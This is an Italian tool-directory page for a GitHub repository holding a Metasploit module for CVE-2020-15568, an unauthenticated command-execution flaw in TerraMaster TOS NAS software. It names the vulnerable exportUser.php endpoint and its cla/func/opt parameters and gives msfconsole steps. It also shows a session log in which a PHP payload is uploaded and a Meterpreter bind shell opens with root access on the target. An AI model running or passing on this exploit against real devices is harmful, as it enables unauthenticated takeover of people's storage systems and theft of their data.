Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
TerraMaster-TOS-CVE-2020-15568 — Repository per il modulo Metasploit CVE-2020-15568 | Kitploit
Strumenti/GitHubGitHub/divinepwner/terramaster-tos-cve-2020-15568
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingCommand and ControlStrumento di Accesso Remoto
GitHubdivinepwner/terramaster-tos-cve-2020-15568

TerraMaster-TOS-CVE-2020-15568

Repository per il modulo Metasploit CVE-2020-15568

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
33 anni faNon ancora revisionato

TerraMaster TOS CVE-2020-15568

Repository per il modulo Metasploit di CVE-2020-15568

Applicazione Vulnerabile

Descrizione

Una vulnerabilità di invocazione dinamica di metodi di classe esiste nel file include/exportUser.php che porta all'esecuzione di comandi remoti sui dispositivi TerraMaster con privilegi di root. Il file vulnerabile richiede che vengano forniti diversi parametri HTTP GET per raggiungere la chiamata al metodo e sfruttare questa vulnerabilità. Alla prima riga, l'applicazione include app.php che carica automaticamente le classi principali pertinenti del software TOS. L'applicazione decide l'operazione in base al valore del parametro GET type. Se il valore della variabile type è diverso da 1 o 2, allora è possibile raggiungere il codice vulnerabile. Nel codice sorgente di exportUser.php, l'applicazione richiede i parametri HTTP GET cla (abbreviazione per class), func e opt.

Durante la revisione del codice anche di altri file, è emerso che esiste un modo per sfruttare questo problema con classi preesistenti nel software TOS. La classe PHP situata in include/class/application.class.php è il miglior candidato per eseguire comandi sui dispositivi che eseguono il software TOS. Poiché exportUser.php non ha controlli di autenticazione, è possibile per un attaccante non autenticato raggiungere l'esecuzione di codice

Passaggi di Verifica

  1. Configura il tuo TerraMaster NAS con TOS versione 4.1.24 o inferiore
  2. Avvia msfconsole
  3. Esegui: use exploit/multi/http/terramaster_command_exec
  4. Esegui set rhost 192.168.1.27
  5. Esegui: check
root@kitploit:~
[+] 192.168.1.27:80 - The target is vulnerable.

Targets

root@kitploit:~
Exploit targets:
   Id  Name
   --  ----
   0   Auto

Scenari

root@kitploit:~
msf5 > use exploit/multi/http/terra_master_command_exec 
msf5 exploit(exploit/multi/http/terramaster_command_exec) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 exploit(multi/http/terramaster_command_exec) > run
[+] Payload uploaded to /logs/FJETBHLL/.vatw.php
[+] Payload successfully triggered !
[*] Started bind TCP handler against 192.168.1.27:9090
[*] Sending stage (38288 bytes) to 192.168.1.27
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.1.27:9090) at 2020-07-23 09:49:34 +0300
meterpreter >
Scarica lo strumento